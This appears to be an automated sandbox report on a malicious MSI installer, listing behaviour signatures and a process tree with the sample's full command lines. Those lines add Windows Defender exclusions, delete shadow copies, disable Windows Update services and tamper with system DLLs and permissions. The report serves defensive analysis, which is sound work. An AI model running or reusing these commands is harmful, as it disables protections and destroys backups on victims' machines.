Analysis

  • max time kernel
    140s
  • max time network
    153s
  • platform
    windows11-ltsc_2024_x64
  • resource
    win11ltsc2024-20260709-en
  • resource tags

    arch:x64arch:x86image:win11ltsc2024-20260709-enlocale:en-usos:windows11-ltsc_2024-x64systemwindows
  • submitted
    31/07/2026, 03:56

General

  • Target
    install_mal004.msi
  • Size 7.7MB
  • Sample260731-ehcslacc63
  • SHA256 9b1a2e658ade78ec74264842e0019c1484efcb19b350aee30a8d62756c7c16c1
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • Windows security bypass 2 TTPs 10 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Possible privilege escalation attempt 21 IoCs
  • Disables service(s) 3 TTPs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Modifies file permissions 1 TTPs 21 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Badlisted process makes network request 6 IoCs

    Network request originating from process or tool commonly abused by malware.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: Clear Persistence 1 TTPs 8 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Drops file in System32 directory 9 IoCs
  • Drops file in Program Files directory 9 IoCs
  • Drops file in Windows directory 13 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
  • Executes a command shell one-liner 1 TTPs 24 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 9 IoCs
  • Modifies registry class 22 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 8 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\install_mal004.msi
    1⤵
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    PID:1816
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:5364
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3108
    • C:\Windows\System32\MsiExec.exe
      C:\Windows\System32\MsiExec.exe -Embedding A7101E666DB3E3FA265CF7984B829B9D E Global\MSI0000
      2⤵
      • Loads dropped DLL
      • Badlisted process makes network request
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetWindowsHookEx
      PID:4808
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious use of AdjustPrivilegeToken
    PID:4140
  • C:\Users\Public\1tO12t\xse8qf.exe
    "C:\Users\Public\1tO12t\xse8qf.exe"
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Adds Run key to start application
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3084
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\ProgramData','C:\Users','C:\Program Files (x86)','C:\' -Force
      2⤵
      • Command and Scripting Interpreter: PowerShell
      PID:2064
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\1tO12t\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
      2⤵
      • Indicator Removal: Clear Persistence
      • Suspicious use of WriteProcessMemory
      PID:1252
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\1tO12t\" /t REG_DWORD /d 0 /f"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:5188
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Run /TN "Task1"
        3⤵
          PID:3532
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Delete /TN "Task1" /F
          3⤵
            PID:5956
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
          2⤵
          • Indicator Removal: Clear Persistence
          • Suspicious use of WriteProcessMemory
          PID:3000
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:4676
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Run /TN "Task1"
            3⤵
              PID:3364
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Delete /TN "Task1" /F
              3⤵
                PID:1144
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              2⤵
              • Indicator Removal: Clear Persistence
              • Suspicious use of WriteProcessMemory
              PID:6120
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:3320
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Run /TN "Task1"
                3⤵
                  PID:3416
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Delete /TN "Task1" /F
                  3⤵
                    PID:1500
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                  2⤵
                  • Indicator Removal: Clear Persistence
                  • Suspicious use of WriteProcessMemory
                  PID:4304
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:1176
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Run /TN "Task1"
                    3⤵
                      PID:3216
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Delete /TN "Task1" /F
                      3⤵
                        PID:1316
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                      2⤵
                      • Indicator Removal: Clear Persistence
                      • Suspicious use of WriteProcessMemory
                      PID:2888
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                        3⤵
                        • Scheduled Task/Job: Scheduled Task
                        PID:3684
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Run /TN "Task1"
                        3⤵
                          PID:4448
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Delete /TN "Task1" /F
                          3⤵
                            PID:5960
                        • C:\Program Files (x86)\IBG7Lg\IBG7Lg.exe
                          "C:\Program Files (x86)\IBG7Lg\IBG7Lg.exe"
                          2⤵
                            PID:4180
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /c icacls "C:\Program Files (x86)\IBG7Lg" /inheritance:r
                              3⤵
                              • Executes a command shell one-liner
                              PID:904
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls "C:\Program Files (x86)\IBG7Lg" /inheritance:r
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                PID:6092
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /c vssadmin delete shadows /all /quiet
                              3⤵
                              • Executes a command shell one-liner
                              PID:4212
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c echo.>c:\xxxx.ini
                              3⤵
                              • Executes a command shell one-liner
                              PID:4588
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c echo.>c:\xxxx.ini
                              3⤵
                              • Executes a command shell one-liner
                              PID:5340
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /c icacls "C:\Program Files (x86)\IBG7Lg" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                              3⤵
                              • Executes a command shell one-liner
                              PID:4600
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls "C:\Program Files (x86)\IBG7Lg" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                PID:5392
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\IBG7Lg\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                              3⤵
                              • Indicator Removal: Clear Persistence
                              PID:3208
                              • C:\Windows\SysWOW64\schtasks.exe
                                SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\IBG7Lg\" /t REG_DWORD /d 0 /f"
                                4⤵
                                • Scheduled Task/Job: Scheduled Task
                                PID:3320
                              • C:\Windows\SysWOW64\schtasks.exe
                                SCHTASKS /Run /TN "Task1"
                                4⤵
                                  PID:5600
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Delete /TN "Task1" /F
                                  4⤵
                                    PID:5248
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" cmd.exe /q /c "@echo off & (for %i in (wuauserv UsoSvc uhssvc WaaSMedicSvc) do ( net stop %i >nul 2>&1 & sc config %i start= disabled >nul 2>&1 & sc failure %i reset= 0 actions= "" >nul 2>&1 )) & (for %i in (WaaSMedicSvc wuaueng) do ( takeown /f C:\Windows\System32\%i.dll >nul 2>&1 & icacls C:\Windows\System32\%i.dll /grant *S-1-1-0:F >nul 2>&1 & rename C:\Windows\System32\%i.dll %i_BAK.dll >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /setowner "NT SERVICE\TrustedInstaller" >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /remove *S-1-1-0 >nul 2>&1 )) & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f >nul 2>&1 & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f >nul 2>&1 & reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f >nul 2>&1 & erase /f /s /q c:\windows\softwaredistribution\*.* >nul 2>&1 & rmdir /s /q c:\windows\softwaredistribution >nul 2>&1 & powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}" >nul 2>&1"
                                  3⤵
                                  • Executes a command shell one-liner
                                  PID:4708
                                  • C:\Windows\SysWOW64\net.exe
                                    net stop wuauserv
                                    4⤵
                                      PID:5068
                                      • C:\Windows\SysWOW64\net1.exe
                                        C:\Windows\system32\net1 stop wuauserv
                                        5⤵
                                          PID:3488
                                      • C:\Windows\SysWOW64\sc.exe
                                        sc config wuauserv start= disabled
                                        4⤵
                                        • Launches sc.exe
                                        PID:1500
                                      • C:\Windows\SysWOW64\sc.exe
                                        sc failure wuauserv reset= 0 actions= ""
                                        4⤵
                                        • Launches sc.exe
                                        PID:4224
                                      • C:\Windows\SysWOW64\net.exe
                                        net stop UsoSvc
                                        4⤵
                                          PID:5888
                                          • C:\Windows\SysWOW64\net1.exe
                                            C:\Windows\system32\net1 stop UsoSvc
                                            5⤵
                                              PID:2556
                                          • C:\Windows\SysWOW64\sc.exe
                                            sc config UsoSvc start= disabled
                                            4⤵
                                            • Launches sc.exe
                                            PID:628
                                          • C:\Windows\SysWOW64\sc.exe
                                            sc failure UsoSvc reset= 0 actions= ""
                                            4⤵
                                            • Launches sc.exe
                                            PID:6008
                                          • C:\Windows\SysWOW64\net.exe
                                            net stop uhssvc
                                            4⤵
                                              PID:5960
                                              • C:\Windows\SysWOW64\net1.exe
                                                C:\Windows\system32\net1 stop uhssvc
                                                5⤵
                                                  PID:1652
                                              • C:\Windows\SysWOW64\sc.exe
                                                sc config uhssvc start= disabled
                                                4⤵
                                                • Launches sc.exe
                                                PID:2288
                                              • C:\Windows\SysWOW64\sc.exe
                                                sc failure uhssvc reset= 0 actions= ""
                                                4⤵
                                                • Launches sc.exe
                                                PID:4044
                                              • C:\Windows\SysWOW64\net.exe
                                                net stop WaaSMedicSvc
                                                4⤵
                                                  PID:2708
                                                  • C:\Windows\SysWOW64\net1.exe
                                                    C:\Windows\system32\net1 stop WaaSMedicSvc
                                                    5⤵
                                                      PID:2368
                                                  • C:\Windows\SysWOW64\sc.exe
                                                    sc config WaaSMedicSvc start= disabled
                                                    4⤵
                                                    • Launches sc.exe
                                                    PID:1616
                                                  • C:\Windows\SysWOW64\sc.exe
                                                    sc failure WaaSMedicSvc reset= 0 actions= ""
                                                    4⤵
                                                    • Launches sc.exe
                                                    PID:3868
                                                  • C:\Windows\SysWOW64\takeown.exe
                                                    takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                                    4⤵
                                                    • Possible privilege escalation attempt
                                                    • Modifies file permissions
                                                    PID:4132
                                                  • C:\Windows\SysWOW64\icacls.exe
                                                    icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F
                                                    4⤵
                                                    • Possible privilege escalation attempt
                                                    • Modifies file permissions
                                                    PID:2624
                                                  • C:\Windows\SysWOW64\icacls.exe
                                                    icacls C:\Windows\System32\WaaSMedicSvc_BAK.dll /setowner "NT SERVICE\TrustedInstaller"
                                                    4⤵
                                                    • Possible privilege escalation attempt
                                                    • Modifies file permissions
                                                    PID:1596
                                                  • C:\Windows\SysWOW64\icacls.exe
                                                    icacls C:\Windows\System32\WaaSMedicSvc_BAK.dll /remove *S-1-1-0
                                                    4⤵
                                                    • Possible privilege escalation attempt
                                                    • Modifies file permissions
                                                    PID:1780
                                                  • C:\Windows\SysWOW64\takeown.exe
                                                    takeown /f C:\Windows\System32\wuaueng.dll
                                                    4⤵
                                                    • Possible privilege escalation attempt
                                                    • Modifies file permissions
                                                    PID:4348
                                                  • C:\Windows\SysWOW64\icacls.exe
                                                    icacls C:\Windows\System32\wuaueng.dll /grant *S-1-1-0:F
                                                    4⤵
                                                    • Possible privilege escalation attempt
                                                    • Modifies file permissions
                                                    PID:4100
                                                  • C:\Windows\SysWOW64\icacls.exe
                                                    icacls C:\Windows\System32\wuaueng_BAK.dll /setowner "NT SERVICE\TrustedInstaller"
                                                    4⤵
                                                    • Possible privilege escalation attempt
                                                    • Modifies file permissions
                                                    PID:4716
                                                  • C:\Windows\SysWOW64\icacls.exe
                                                    icacls C:\Windows\System32\wuaueng_BAK.dll /remove *S-1-1-0
                                                    4⤵
                                                    • Possible privilege escalation attempt
                                                    • Modifies file permissions
                                                    PID:240
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
                                                    4⤵
                                                      PID:3272
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
                                                      4⤵
                                                        PID:4196
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f
                                                        4⤵
                                                          PID:2512
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}"
                                                          4⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          PID:3356
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd.exe /c icacls "C:\Program Files (x86)\IBG7Lg" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                                                        3⤵
                                                        • Executes a command shell one-liner
                                                        PID:5280
                                                        • C:\Windows\SysWOW64\icacls.exe
                                                          icacls "C:\Program Files (x86)\IBG7Lg" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                                                          4⤵
                                                          • Possible privilege escalation attempt
                                                          • Modifies file permissions
                                                          PID:1504
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd.exe /c icacls "C:\Program Files (x86)\IBG7Lg\IBG7Lg.exe" /inheritance:r
                                                        3⤵
                                                        • Executes a command shell one-liner
                                                        PID:5848
                                                        • C:\Windows\SysWOW64\icacls.exe
                                                          icacls "C:\Program Files (x86)\IBG7Lg\IBG7Lg.exe" /inheritance:r
                                                          4⤵
                                                          • Possible privilege escalation attempt
                                                          • Modifies file permissions
                                                          PID:4068
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd.exe /c icacls "C:\Program Files (x86)\IBG7Lg\IBG7Lg.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                        3⤵
                                                        • Executes a command shell one-liner
                                                        PID:4496
                                                        • C:\Windows\SysWOW64\icacls.exe
                                                          icacls "C:\Program Files (x86)\IBG7Lg\IBG7Lg.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                          4⤵
                                                          • Possible privilege escalation attempt
                                                          • Modifies file permissions
                                                          PID:5084
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd.exe /c icacls "C:\Program Files (x86)\IBG7Lg\IBG7Lg.exe" /grant:r Users:(RX) /deny Users:(DE)
                                                        3⤵
                                                        • Executes a command shell one-liner
                                                        PID:5096
                                                        • C:\Windows\SysWOW64\icacls.exe
                                                          icacls "C:\Program Files (x86)\IBG7Lg\IBG7Lg.exe" /grant:r Users:(RX) /deny Users:(DE)
                                                          4⤵
                                                          • Possible privilege escalation attempt
                                                          • Modifies file permissions
                                                          PID:3844
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd.exe /c icacls "C:\Program Files (x86)\IBG7Lg\image.png" /inheritance:r
                                                        3⤵
                                                        • Executes a command shell one-liner
                                                        PID:4944
                                                        • C:\Windows\SysWOW64\icacls.exe
                                                          icacls "C:\Program Files (x86)\IBG7Lg\image.png" /inheritance:r
                                                          4⤵
                                                          • Possible privilege escalation attempt
                                                          • Modifies file permissions
                                                          PID:5844
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd.exe /c icacls "C:\Program Files (x86)\IBG7Lg\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                        3⤵
                                                        • Executes a command shell one-liner
                                                        PID:896
                                                        • C:\Windows\SysWOW64\icacls.exe
                                                          icacls "C:\Program Files (x86)\IBG7Lg\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                          4⤵
                                                          • Possible privilege escalation attempt
                                                          • Modifies file permissions
                                                          PID:4816
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd.exe /c icacls "C:\Program Files (x86)\IBG7Lg\image.png" /grant:r Users:(RX) /deny Users:(DE)
                                                        3⤵
                                                        • Executes a command shell one-liner
                                                        PID:4648
                                                        • C:\Windows\SysWOW64\icacls.exe
                                                          icacls "C:\Program Files (x86)\IBG7Lg\image.png" /grant:r Users:(RX) /deny Users:(DE)
                                                          4⤵
                                                          • Possible privilege escalation attempt
                                                          • Modifies file permissions
                                                          PID:1564
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd.exe /c icacls "C:\Program Files (x86)\IBG7Lg\thumbs.db" /inheritance:r
                                                        3⤵
                                                        • Executes a command shell one-liner
                                                        PID:708
                                                        • C:\Windows\SysWOW64\icacls.exe
                                                          icacls "C:\Program Files (x86)\IBG7Lg\thumbs.db" /inheritance:r
                                                          4⤵
                                                          • Possible privilege escalation attempt
                                                          • Modifies file permissions
                                                          PID:2152
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                        3⤵
                                                        • Indicator Removal: Clear Persistence
                                                        PID:2544
                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                          SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
                                                          4⤵
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:2956
                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                          SCHTASKS /Run /TN "Task1"
                                                          4⤵
                                                            PID:2724
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            SCHTASKS /Delete /TN "Task1" /F
                                                            4⤵
                                                              PID:5984
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd.exe /c icacls "C:\Program Files (x86)\IBG7Lg\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                            3⤵
                                                            • Executes a command shell one-liner
                                                            PID:800
                                                            • C:\Windows\SysWOW64\icacls.exe
                                                              icacls "C:\Program Files (x86)\IBG7Lg\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                              4⤵
                                                              • Possible privilege escalation attempt
                                                              • Modifies file permissions
                                                              PID:5800
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd.exe /c icacls "C:\Program Files (x86)\IBG7Lg\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                                                            3⤵
                                                            • Executes a command shell one-liner
                                                            PID:5928
                                                            • C:\Windows\SysWOW64\icacls.exe
                                                              icacls "C:\Program Files (x86)\IBG7Lg\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                                                              4⤵
                                                              • Possible privilege escalation attempt
                                                              • Modifies file permissions
                                                              PID:1532
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd.exe /c icacls "C:\Program Files (x86)\IBG7Lg\XPSPLOG.dll" /inheritance:r
                                                            3⤵
                                                            • Executes a command shell one-liner
                                                            PID:4492
                                                            • C:\Windows\SysWOW64\icacls.exe
                                                              icacls "C:\Program Files (x86)\IBG7Lg\XPSPLOG.dll" /inheritance:r
                                                              4⤵
                                                              • Possible privilege escalation attempt
                                                              • Modifies file permissions
                                                              PID:4588
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                            3⤵
                                                            • Indicator Removal: Clear Persistence
                                                            PID:3136
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                                                              4⤵
                                                              • Scheduled Task/Job: Scheduled Task
                                                              PID:4996
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              SCHTASKS /Run /TN "Task1"
                                                              4⤵
                                                                PID:4608
